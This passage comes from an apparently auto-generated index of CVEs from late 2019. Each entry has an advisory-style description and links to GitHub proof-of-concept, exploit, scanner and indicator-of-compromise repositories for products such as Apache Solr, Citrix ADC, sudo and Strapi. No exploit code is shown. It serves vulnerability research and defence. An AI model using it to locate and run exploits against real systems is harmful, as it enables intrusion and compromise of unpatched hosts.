The login page on D-Link DIR-615 T1 20.10 devices allows remote attackers to bypass the CAPTCHA protection mechanism and conduct brute-force attacks.

- [huzaifahussain98/CVE-2019-17525](https://github.com/huzaifahussain98/CVE-2019-17525)

### CVE-2019-17558 (2019-12-30)

Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).

- [thelostworldFree/CVE-2019-17558_Solr_Vul_Tool](https://github.com/thelostworldFree/CVE-2019-17558_Solr_Vul_Tool)
- [zhzyker/exphub](https://github.com/zhzyker/exphub)
- [Ma1Dong/Solr_CVE-2019-17558](https://github.com/Ma1Dong/Solr_CVE-2019-17558)
- [xkyrage/Exploit_CVE-2019-17558-RCE](https://github.com/xkyrage/Exploit_CVE-2019-17558-RCE)

### CVE-2019-17564 (2020-04-01)

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.

- [r00t4dm/CVE-2019-17564](https://github.com/r00t4dm/CVE-2019-17564)
- [Jaky5155/CVE-2019-17564](https://github.com/Jaky5155/CVE-2019-17564)
- [Hu3sky/CVE-2019-17564](https://github.com/Hu3sky/CVE-2019-17564)
- [Exploit-3389/CVE-2019-17564](https://github.com/Exploit-3389/CVE-2019-17564)
- [Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget](https://github.com/Dor-Tumarkin/CVE-2019-17564-FastJson-Gadget)
- [fairyming/CVE-2019-17564](https://github.com/fairyming/CVE-2019-17564)

### CVE-2019-17570 (2020-01-23)

An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of the Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target an XML-RPC client, causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed.

- [r00t4dm/CVE-2019-17570](https://github.com/r00t4dm/CVE-2019-17570)
- [slowmistio/xmlrpc-common-deserialization](https://github.com/slowmistio/xmlrpc-common-deserialization)

### CVE-2019-17571 (2019-12-20)

Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data, which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget while listening to untrusted network traffic for log data. This affects Log4j versions 1.2 up to 1.2.17.

- [shadow-horse/CVE-2019-17571](https://github.com/shadow-horse/CVE-2019-17571)
- [Al1ex/CVE-2019-17571](https://github.com/Al1ex/CVE-2019-17571)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)

### CVE-2019-17596 (2019-10-24)

Go before 1.12.11 and 1.3.x before 1.13.2 can panic upon an attempt to process network traffic containing an invalid DSA public key. There are several attack scenarios, such as traffic from a client to a server that verifies client certificates.

- [pquerna/poc-dsa-verify-CVE-2019-17596](https://github.com/pquerna/poc-dsa-verify-CVE-2019-17596)

### CVE-2019-17621 (2019-12-30)

The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connected to the local network.

- [Squirre17/CVE-2019-17621](https://github.com/Squirre17/CVE-2019-17621)

### CVE-2019-17625 (2019-10-16)

There is a stored XSS in Rambox 0.6.9 that can lead to code execution. The XSS is in the name field while adding/editing a service. The problem occurs due to incorrect sanitization of the name field when being processed and stored. This allows a user to craft a payload for Node.js and Electron, such as an exec of OS commands within the onerror attribute of an IMG element.

- [Ekultek/CVE-2019-17625](https://github.com/Ekultek/CVE-2019-17625)

### CVE-2019-17633 (2019-12-19)

For Eclipse Che versions 6.16 to 7.3.0, with both authentication and TLS disabled, visiting a malicious web site could trigger the start of an arbitrary Che workspace. Che with no authentication and no TLS is not usually deployed on a public network but is often used for local installations (e.g. on personal laptops). In that case, even if the Che API is not exposed externally, some javascript running in the local browser is able to send requests to it.

- [mgrube/CVE-2019-17633](https://github.com/mgrube/CVE-2019-17633)

### CVE-2019-17638 (2020-07-09)

In Eclipse Jetty, versions 9.4.27.v20200227 to 9.4.29.v20200521, in case of too large response headers, Jetty throws an exception to produce an HTTP 431 error. When this happens, the ByteBuffer containing the HTTP response headers is released back to the ByteBufferPool twice. Because of this double release, two threads can acquire the same ByteBuffer from the pool and while thread1 is about to use the ByteBuffer to write response1 data, thread2 fills the ByteBuffer with other data. Thread1 then proceeds to write the buffer that now contains different data. This results in client1, which issued request1 seeing data from another request or response which could contain sensitive data belonging to client2 (HTTP session ids, authentication credentials, etc.). If the Jetty version cannot be upgraded, the vulnerability can be significantly reduced by configuring a responseHeaderSize significantly larger than the requestHeaderSize (12KB responseHeaderSize and 8KB requestHeaderSize).

- [forse01/CVE-2019-17638-Jetty](https://github.com/forse01/CVE-2019-17638-Jetty)

### CVE-2019-17658 (2020-03-12)

An unquoted service path vulnerability in the FortiClient FortiTray component of FortiClientWindows v6.2.2 and prior allows an attacker to gain elevated privileges via the FortiClientConsole executable service path.

- [Ibonok/CVE-2019-17658](https://github.com/Ibonok/CVE-2019-17658)

### CVE-2019-17662 (2019-10-16)

ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.

- [MuirlandOracle/CVE-2019-17662](https://github.com/MuirlandOracle/CVE-2019-17662)
- [kxisxr/Bash-Script-CVE-2019-17662](https://github.com/kxisxr/Bash-Script-CVE-2019-17662)
- [whokilleddb/CVE-2019-17662](https://github.com/whokilleddb/CVE-2019-17662)
- [rajendrakumaryadav/CVE-2019-17662-Exploit](https://github.com/rajendrakumaryadav/CVE-2019-17662-Exploit)
- [Tamagaft/CVE-2019-17662](https://github.com/Tamagaft/CVE-2019-17662)
- [bl4ck574r/CVE-2019-17662](https://github.com/bl4ck574r/CVE-2019-17662)
- [thomas-osgood/CVE-2019-17662](https://github.com/thomas-osgood/CVE-2019-17662)
- [medarov411/vnc-lab-cve-2019-17662](https://github.com/medarov411/vnc-lab-cve-2019-17662)

### CVE-2019-17666 (2019-10-17)

rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.

- [uthrasri/CVE-2019-17666](https://github.com/uthrasri/CVE-2019-17666)

### CVE-2019-17671 (2019-10-17)

In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled.

- [rhbb/CVE-2019-17671](https://github.com/rhbb/CVE-2019-17671)

### CVE-2019-18276 (2019-11-28)

An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.

- [M-ensimag/CVE-2019-18276](https://github.com/M-ensimag/CVE-2019-18276)
- [SABI-Ensimag/CVE-2019-18276](https://github.com/SABI-Ensimag/CVE-2019-18276)

### CVE-2019-18370 (2019-10-23)

An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress, so one can control the contents of the files in the decompressed directory. In addition, the application's sh script for testing upload and download speeds reads a URL list from /tmp/speedtest_urls.xml, and there is a command injection vulnerability, as demonstrated by api/xqnetdetect/netspeed.

- [FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis](https://github.com/FzBacon/CVE-2019-18370_XiaoMi_Mi_WIFI_RCE_analysis)

### CVE-2019-18371 (2019-10-23)

An issue was discovered on Xiaomi Mi WiFi R3G devices before 2.28.23-stable. There is a directory traversal vulnerability to read arbitrary files via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.

- [UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC)
- [AjayMT6/UltramanGaia](https://github.com/AjayMT6/UltramanGaia)
- [jsnhcuan1997/UltramanGaia](https://github.com/jsnhcuan1997/UltramanGaia)

### CVE-2019-18426 (2020-01-21)

A vulnerability in WhatsApp Desktop versions prior to 0.3.9309 when paired with WhatsApp for iPhone versions prior to 2.20.10 allows cross-site scripting and local file reading. Exploiting the vulnerability requires the victim to click a link preview from a specially crafted text message.

- [PerimeterX/CVE-2019-18426](https://github.com/PerimeterX/CVE-2019-18426)

### CVE-2019-18634 (2020-01-29)

In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.) The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.

- [Plazmaz/CVE-2019-18634](https://github.com/Plazmaz/CVE-2019-18634)
- [saleemrashid/sudo-cve-2019-18634](https://github.com/saleemrashid/sudo-cve-2019-18634)
- [N1et/CVE-2019-18634](https://github.com/N1et/CVE-2019-18634)
- [ptef/CVE-2019-18634](https://github.com/ptef/CVE-2019-18634)
- [edsonjt81/sudo-cve-2019-18634](https://github.com/edsonjt81/sudo-cve-2019-18634)
- [paras1te-x/CVE-2019-18634](https://github.com/paras1te-x/CVE-2019-18634)
- [aesophor/CVE-2019-18634](https://github.com/aesophor/CVE-2019-18634)
- [TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634](https://github.com/TheJoyOfHacking/saleemrashid-sudo-cve-2019-18634)
- [DDayLuong/CVE-2019-18634](https://github.com/DDayLuong/CVE-2019-18634)
- [chanbakjsd/CVE-2019-18634](https://github.com/chanbakjsd/CVE-2019-18634)

### CVE-2019-18655 (2019-11-12)

File Sharing Wizard version 1.5.0 build 2008 is affected by a Structured Exception Handler based buffer overflow vulnerability. An unauthenticated attacker is able to perform remote command execution and obtain a command shell by sending an HTTP GET request including the malicious payload in the URL. A similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331.

- [0xhuesca/CVE-2019-18655](https://github.com/0xhuesca/CVE-2019-18655)

### CVE-2019-18683 (2019-11-04)

An issue was discovered in drivers/media/platform/vivid in the Linux kernel through 5.3.8. It is exploitable for privilege escalation on some Linux distributions where local users have /dev/video0 access, but only if the driver happens to be loaded. There are multiple race conditions during streaming stopping in this driver (part of the V4L2 subsystem). These issues are caused by wrong mutex locking in vivid_stop_generating_vid_cap(), vivid_stop_generating_vid_out(), sdr_cap_stop_streaming(), and the corresponding kthreads. At least one of these race conditions leads to a use-after-free.

- [sanjana123-cloud/CVE-2019-18683](https://github.com/sanjana123-cloud/CVE-2019-18683)
- [Limesss/cve-2019-18683](https://github.com/Limesss/cve-2019-18683)

### CVE-2019-18818 (2019-11-07)

strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.

- [guglia001/CVE-2019-18818](https://github.com/guglia001/CVE-2019-18818)
- [rasyidfox/CVE-2019-18818](https://github.com/rasyidfox/CVE-2019-18818)
- [hadrian3689/strapi_cms_3.0.0-beta.17.7](https://github.com/hadrian3689/strapi_cms_3.0.0-beta.17.7)
- [Hackhoven/Strapi-RCE](https://github.com/Hackhoven/Strapi-RCE)

### CVE-2019-18845 (2019-11-09)

The MsIo64.sys and MsIo32.sys drivers in Patriot Viper RGB before 1.1 allow local users (including low integrity processes) to read and write to arbitrary memory locations, and consequently gain NT AUTHORITY\SYSTEM privileges, by mapping \Device\PhysicalMemory into the calling process via ZwOpenSection and ZwMapViewOfSection.

- [fengjixuchui/CVE-2019-18845](https://github.com/fengjixuchui/CVE-2019-18845)

### CVE-2019-18873 (2019-11-12)

FUDForum 3.0.9 is vulnerable to Stored XSS via the User-Agent HTTP header. This may result in remote code execution. An attacker can use a user account to fully compromise the system via a GET request. When the admin visits user information under "User Manager" in the control panel, the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server. The problem is in admsession.php and admuser.php.

- [fuzzlove/FUDforum-XSS-RCE](https://github.com/fuzzlove/FUDforum-XSS-RCE)

### CVE-2019-18885 (2019-11-14)

fs/btrfs/volumes.c in the Linux kernel before 5.1 allows a btrfs_verify_dev_extents NULL pointer dereference via a crafted btrfs image because fs_devices->devices is mishandled within find_device, aka CID-09ba3bc9dd15.

- [bobfuzzer/CVE-2019-18885](https://github.com/bobfuzzer/CVE-2019-18885)

### CVE-2019-18890 (2019-11-21)

A SQL injection vulnerability in Redmine through 3.2.9 and 3.3.x before 3.3.10 allows Redmine users to access protected information via a crafted object query.

- [RealLinkers/CVE-2019-18890](https://github.com/RealLinkers/CVE-2019-18890)

### CVE-2019-18935 (2019-12-11)

Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)

- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto)
- [noperator/CVE-2019-18935](https://github.com/noperator/CVE-2019-18935)
- [becrevex/Telerik_CVE-2019-18935](https://github.com/becrevex/Telerik_CVE-2019-18935)
- [ThanHuuTuan/Telerik_CVE-2019-18935](https://github.com/ThanHuuTuan/Telerik_CVE-2019-18935)
- [ThanHuuTuan/CVE_2019_18935](https://github.com/ThanHuuTuan/CVE_2019_18935)
- [murataydemir/CVE-2019-18935](https://github.com/murataydemir/CVE-2019-18935)
- [appliedi/Telerik_CVE-2019-18935](https://github.com/appliedi/Telerik_CVE-2019-18935)
- [random-robbie/CVE-2019-18935](https://github.com/random-robbie/CVE-2019-18935)
- [0xAgun/CVE-2019-18935-checker](https://github.com/0xAgun/CVE-2019-18935-checker)
- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation)
- [dust-life/CVE-2019-18935-memShell](https://github.com/dust-life/CVE-2019-18935-memShell)

### CVE-2019-18988 (2020-02-07)

TeamViewer Desktop through 14.7.1965 allows a bypass of remote-login access control because the same key is used for different customers' installations. It used a shared AES key for all installations since at least as far back as v7.0.43148, and used it for at least OptionsPasswordAES in the current version of the product. If an attacker were to know this key, they could decrypt protected information stored in the registry or configuration files of TeamViewer. With versions before v9.x, this allowed attackers to decrypt the Unattended Access password to the system (which allows for remote login to the system as well as headless file browsing). The latest version still uses the same key for OptionPasswordAES but appears to have changed how the Unattended Access password is stored. While in most cases an attacker requires an existing session on a system, if the registry/configuration keys were stored off of the machine (such as in a file share or online), an attacker could then decrypt the required password to log in to the system.

- [reversebrain/CVE-2019-18988](https://github.com/reversebrain/CVE-2019-18988)
- [mr-r3b00t/CVE-2019-18988](https://github.com/mr-r3b00t/CVE-2019-18988)

### CVE-2019-19012 (2019-11-16)

An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read, in which the offset of this read is under the control of an attacker. (This only affects the 32-bit compiled version). Remote attackers can cause a denial-of-service or information disclosure, or possibly have unspecified other impact, via a crafted regular expression.

- [ManhNDd/CVE-2019-19012](https://github.com/ManhNDd/CVE-2019-19012)
- [tarantula-team/CVE-2019-19012](https://github.com/tarantula-team/CVE-2019-19012)

### CVE-2019-19030 (2022-12-26)

Cloud Native Computing Foundation Harbor before 1.10.3 and 2.x before 2.0.1 allows resource enumeration because unauthenticated API calls reveal (via the HTTP status code) whether a resource exists.

- [shodanwashere/boatcrash](https://github.com/shodanwashere/boatcrash)

### CVE-2019-19033 (2019-11-21)

Jalios JCMS 10 allows attackers to access any part of the website and the WebDAV server with administrative privileges via a backdoor account, by using any username and the hardcoded dev password.

- [ricardojoserf/CVE-2019-19033](https://github.com/ricardojoserf/CVE-2019-19033)

### CVE-2019-19194 (2020-02-12)

The Bluetooth Low Energy Secure Manager Protocol (SMP) implementation on Telink Semiconductor BLE SDK versions before November 2019 for TLSR8x5x through 3.4.0, TLSR823x through 1.3.0, and TLSR826x through 3.3 devices installs a zero long term key (LTK) if an out-of-order link-layer encryption request is received during Secure Connections pairing. An attacker in radio range can have arbitrary read/write access to protected GATT service data, cause a device crash, or possibly control a device's function by establishing an encrypted session with the zero LTK.

- [louisabricot/writeup-cve-2019-19194](https://github.com/louisabricot/writeup-cve-2019-19194)

### CVE-2019-19203 (2019-11-21)

An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function gb18030_mbc_enc_len in file gb18030.c, a UChar pointer is dereferenced without checking if it passed the end of the matched string. This leads to a heap-based buffer over-read.

- [ManhNDd/CVE-2019-19203](https://github.com/ManhNDd/CVE-2019-19203)
- [tarantula-team/CVE-2019-19203](https://github.com/tarantula-team/CVE-2019-19203)

### CVE-2019-19204 (2019-11-21)

An issue was discovered in Oniguruma 6.x before 6.9.4_rc2. In the function fetch_interval_quantifier (formerly known as fetch_range_quantifier) in regparse.c, PFETCH is called without checking PEND. This leads to a heap-based buffer over-read.

- [ManhNDd/CVE-2019-19204](https://github.com/ManhNDd/CVE-2019-19204)
- [tarantula-team/CVE-2019-19204](https://github.com/tarantula-team/CVE-2019-19204)

### CVE-2019-19231 (2019-12-20)

An insecure file access vulnerability exists in CA Client Automation 14.0, 14.1, 14.2, and 14.3 Agent for Windows that can allow a local attacker to gain escalated privileges.

- [hessandrew/CVE-2019-19231](https://github.com/hessandrew/CVE-2019-19231)

### CVE-2019-19268
- [TheCyberGeek/CVE-2019-19268](https://github.com/TheCyberGeek/CVE-2019-19268)

### CVE-2019-19315 (2019-12-17)

NLSSRV32.EXE in Nalpeiron Licensing Service 7.3.4.0, as used with Nitro PDF and other products, allows Elevation of Privilege via the \\.\mailslot\nlsX86ccMailslot mailslot.

- [monoxgas/mailorder](https://github.com/monoxgas/mailorder)

### CVE-2019-19356 (2020-02-07)

Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.

- [shadowgatt/CVE-2019-19356](https://github.com/shadowgatt/CVE-2019-19356)
- [qq1515406085/CVE-2019-19356](https://github.com/qq1515406085/CVE-2019-19356)

### CVE-2019-19369
- [TheCyberGeek/CVE-2019-19369](https://github.com/TheCyberGeek/CVE-2019-19369)

### CVE-2019-19383 (2019-12-03)

freeFTPd 1.0.8 has a Post-Authentication Buffer Overflow via a crafted SIZE command (this is exploitable even if logging is disabled).

- [killvxk/CVE-2019-19383](https://github.com/killvxk/CVE-2019-19383)

### CVE-2019-19393 (2020-10-01)

The Web application on Rittal CMC PU III 7030.000 V3.00 V3.11.00_2 to V3.15.70_4 devices fails to sanitize user input on the system configurations page. This allows an attacker to backdoor the device with HTML and browser-interpreted content (such as JavaScript or other client-side scripts) as the content is always displayed after and before login. Persistent XSS allows an attacker to modify displayed content or to change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or a hijacked session.

- [miguelhamal/CVE-2019-19393](https://github.com/miguelhamal/CVE-2019-19393)

### CVE-2019-19447 (2019-12-08)

In the Linux kernel 5.0.21, mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c, related to dump_orphan_list in fs/ext4/super.c.

- [Trinadh465/linux-4.19.72_CVE-2019-19447](https://github.com/Trinadh465/linux-4.19.72_CVE-2019-19447)

### CVE-2019-19470 (2019-12-30)

Unsafe usage of .NET deserialization in Named Pipe message processing allows privilege escalation to NT AUTHORITY\SYSTEM for a local attacker. Affected product is TinyWall, all versions up to and including 2.1.12. Fixed in version 2.1.13.

- [juliourena/CVE-2019-19470-RedTeamRD](https://github.com/juliourena/CVE-2019-19470-RedTeamRD)

### CVE-2019-19492 (2019-12-02)

FreeSWITCH 1.6.10 through 1.10.1 has a default password in event_socket.conf.xml.

- [Chocapikk/CVE-2019-19492](https://github.com/Chocapikk/CVE-2019-19492)
- [tucommenceapousser/CVE-2019-19492](https://github.com/tucommenceapousser/CVE-2019-19492)
- [tucommenceapousser/CVE-2019-19492-2](https://github.com/tucommenceapousser/CVE-2019-19492-2)

### CVE-2019-19511
- [jra89/CVE-2019-19511](https://github.com/jra89/CVE-2019-19511)

### CVE-2019-19520 (2019-12-04)

xlock in OpenBSD 6.6 allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen.

- [retrymp3/Openbsd-Privilege-Escalation](https://github.com/retrymp3/Openbsd-Privilege-Escalation)

### CVE-2019-19547 (2020-01-13)

Symantec Endpoint Detection and Response (SEDR), prior to 4.3.0, may be susceptible to a cross site scripting (XSS) issue. XSS is a type of issue that can enable attackers to inject client-side scripts into web pages viewed by other users. An XSS vulnerability may be used by attackers to potentially bypass access controls such as the same-origin policy.

- [nasbench/CVE-2019-19547](https://github.com/nasbench/CVE-2019-19547)

### CVE-2019-19550 (2020-01-31)

Remote Authentication Bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 allows admin access to sensitive information of affected users using vulnerable versions. The attacker only needs to provide the correct URL.

- [underprotection/CVE-2019-19550](https://github.com/underprotection/CVE-2019-19550)
- [redteambrasil/CVE-2019-19550](https://github.com/redteambrasil/CVE-2019-19550)

### CVE-2019-19576 (2019-12-04)

class.upload.php in verot.net class.upload before 1.0.3 and 2.x before 2.0.4, as used in the K2 extension for Joomla! and other products, omits .phar from the set of dangerous file extensions.

- [jra89/CVE-2019-19576](https://github.com/jra89/CVE-2019-19576)

### CVE-2019-19609 (2019-12-05)

The Strapi framework before 3.0.0-beta.17.8 is vulnerable to Remote Code Execution in the Install and Uninstall Plugin components of the Admin panel, because it does not sanitize the plugin name, and attackers can inject arbitrary shell commands to be executed by the execa function.

- [ebadfd/CVE-2019-19609](https://github.com/ebadfd/CVE-2019-19609)
- [diego-tella/CVE-2019-19609-EXPLOIT](https://github.com/diego-tella/CVE-2019-19609-EXPLOIT)
- [guglia001/CVE-2019-19609](https://github.com/guglia001/CVE-2019-19609)
- [D3m0nicw0lf/CVE-2019-19609](https://github.com/D3m0nicw0lf/CVE-2019-19609)
- [n000xy/CVE-2019-19609-POC-Python](https://github.com/n000xy/CVE-2019-19609-POC-Python)
- [RamPanic/CVE-2019-19609-EXPLOIT](https://github.com/RamPanic/CVE-2019-19609-EXPLOIT)
- [glowbase/CVE-2019-19609](https://github.com/glowbase/CVE-2019-19609)

### CVE-2019-19633
- [jra89/CVE-2019-19633](https://github.com/jra89/CVE-2019-19633)

### CVE-2019-19634 (2019-12-17)

class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576.

- [jra89/CVE-2019-19634](https://github.com/jra89/CVE-2019-19634)

### CVE-2019-19651
- [jra89/CVE-2019-19651](https://github.com/jra89/CVE-2019-19651)

### CVE-2019-19652
- [jra89/CVE-2019-19652](https://github.com/jra89/CVE-2019-19652)

### CVE-2019-19653
- [jra89/CVE-2019-19653](https://github.com/jra89/CVE-2019-19653)

### CVE-2019-19654
- [jra89/CVE-2019-19654](https://github.com/jra89/CVE-2019-19654)

### CVE-2019-19658
- [jra89/CVE-2019-19658](https://github.com/jra89/CVE-2019-19658)

### CVE-2019-19699 (2020-04-06)

There is authenticated remote code execution in Centreon Infrastructure Monitoring Software through 19.10 via Pollers misconfiguration, leading to system compromise via apache crontab misconfiguration. This allows the apache user to modify an executable file executed by root at 22:30 every day. To exploit the vulnerability, someone must have Admin access to the Centreon Web Interface and create a custom main.php?p=60803&type=3 command. The user must then set the Pollers Post-Restart Command to this previously created command via the main.php?p=60901&o=c&server_id=1 URI. This is triggered via an export of the Poller Configuration.

- [SpengeSec/CVE-2019-19699](https://github.com/SpengeSec/CVE-2019-19699)

### CVE-2019-19781 (2019-12-27)

An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.

- [projectzeroindia/CVE-2019-19781](https://github.com/projectzeroindia/CVE-2019-19781)
- [trustedsec/cve-2019-19781](https://github.com/trustedsec/cve-2019-19781)
- [cisagov/check-cve-2019-19781](https://github.com/cisagov/check-cve-2019-19781)
- [jas502n/CVE-2019-19781](https://github.com/jas502n/CVE-2019-19781)
- [ianxtianxt/CVE-2019-19781](https://github.com/ianxtianxt/CVE-2019-19781)
- [mpgn/CVE-2019-19781](https://github.com/mpgn/CVE-2019-19781)
- [oways/CVE-2019-19781](https://github.com/oways/CVE-2019-19781)
- [becrevex/Citrix_CVE-2019-19781](https://github.com/becrevex/Citrix_CVE-2019-19781)
- [unknowndevice64/Exploits_CVE-2019-19781](https://github.com/unknowndevice64/Exploits_CVE-2019-19781)
- [haxrob/citrixmash_scanner](https://github.com/haxrob/citrixmash_scanner)
- [jamesjguthrie/Shitrix-CVE-2019-19781](https://github.com/jamesjguthrie/Shitrix-CVE-2019-19781)
- [haxrob/CVE-2019-19781](https://github.com/haxrob/CVE-2019-19781)
- [hollerith/CVE-2019-19781](https://github.com/hollerith/CVE-2019-19781)
- [aqhmal/CVE-2019-19781](https://github.com/aqhmal/CVE-2019-19781)
- [MalwareTech/CitrixHoneypot](https://github.com/MalwareTech/CitrixHoneypot)
- [mekhalleh/citrix_dir_traversal_rce](https://github.com/mekhalleh/citrix_dir_traversal_rce)
- [zenturacp/cve-2019-19781-web](https://github.com/zenturacp/cve-2019-19781-web)
- [zgelici/CVE-2019-19781-Checker](https://github.com/zgelici/CVE-2019-19781-Checker)
- [digitalshadows/CVE-2019-19781_IOCs](https://github.com/digitalshadows/CVE-2019-19781_IOCs)
- [onSec-fr/CVE-2019-19781-Forensic](https://github.com/onSec-fr/CVE-2019-19781-Forensic)
- [DanielWep/CVE-NetScalerFileSystemCheck](https://github.com/DanielWep/CVE-NetScalerFileSystemCheck)
- [Castaldio86/Detect-CVE-2019-19781](https://github.com/Castaldio86/Detect-CVE-2019-19781)
- [j81blog/ADC-19781](https://github.com/j81blog/ADC-19781)
- [b510/CVE-2019-19781](https://github.com/b510/CVE-2019-19781)
- [redscan/CVE-2019-19781](https://github.com/redscan/CVE-2019-19781)
- [digitalgangst/massCitrix](https://github.com/digitalgangst/massCitrix)
- [mandiant/ioc-scanner-CVE-2019-19781](https://github.com/mandiant/ioc-scanner-CVE-2019-19781)
- [citrix/ioc-scanner-CVE-2019-19781](https://github.com/citrix/ioc-scanner-CVE-2019-19781)
- [haxrob/citrix-honeypot](https://github.com/haxrob/citrix-honeypot)
- [L4r1k/CitrixNetscalerAnalysis](https://github.com/L4r1k/CitrixNetscalerAnalysis)
- [Azeemering/CVE-2019-19781-DFIR-Notes](https://github.com/Azeemering/CVE-2019-19781-DFIR-Notes)
- [0xams/citrixvulncheck](https://github.com/0xams/citrixvulncheck)
- [r4ulcl/CVE-2019-19781](https://github.com/r4ulcl/CVE-2019-19781)
- [nmanzi/webcvescanner](https://github.com/nmanzi/webcvescanner)
- [darren646/CVE-2019-19781POC](https://github.com/darren646/CVE-2019-19781POC)
- [Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201](https://github.com/Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201)
- [yukar1z0e/CVE-2019-19781](https://github.com/yukar1z0e/CVE-2019-19781)
- [SharpHack/CVE-2019-19781](https://github.com/SharpHack/CVE-2019-19781)
- [qiong-qi/CVE-2019-19781-poc](https://github.com/qiong-qi/CVE-2019-19781-poc)
- [w4fz5uck5/CVE-2019-19781-CitrixRCE](https://github.com/w4fz5uck5/CVE-2019-19781-CitrixRCE)
- [andripwn/CVE-2019-19781](https://github.com/andripwn/CVE-2019-19781)
- [VladRico/CVE-2019-19781](https://github.com/VladRico/CVE-2019-19781)
- [pwn3z/CVE-2019-19781-Citrix](https://github.com/pwn3z/CVE-2019-19781-Citrix)
- [Vulnmachines/Ctirix_RCE-CVE-2019-19781](https://github.com/Vulnmachines/Ctirix_RCE-CVE-2019-19781)
- [k-fire/CVE-2019-19781-exploit](https://github.com/k-fire/CVE-2019-19781-exploit)
- [zerobytesecure/CVE-2019-19781](https://github.com/zerobytesecure/CVE-2019-19781)
- [citrixgitoff/-ioc-scanner-CVE-2019-19781](https://github.com/citrixgitoff/-ioc-scanner-CVE-2019-19781)

### CVE-2019-19782 (2019-12-13)

The FTP client in AceaXe Plus 1.0 allows a buffer overflow via a long EHLO response from an FTP server.

- [Underwood12/CVE-2019-19782](https://github.com/Underwood12/CVE-2019-19782)

### CVE-2019-19842 (2020-01-22)

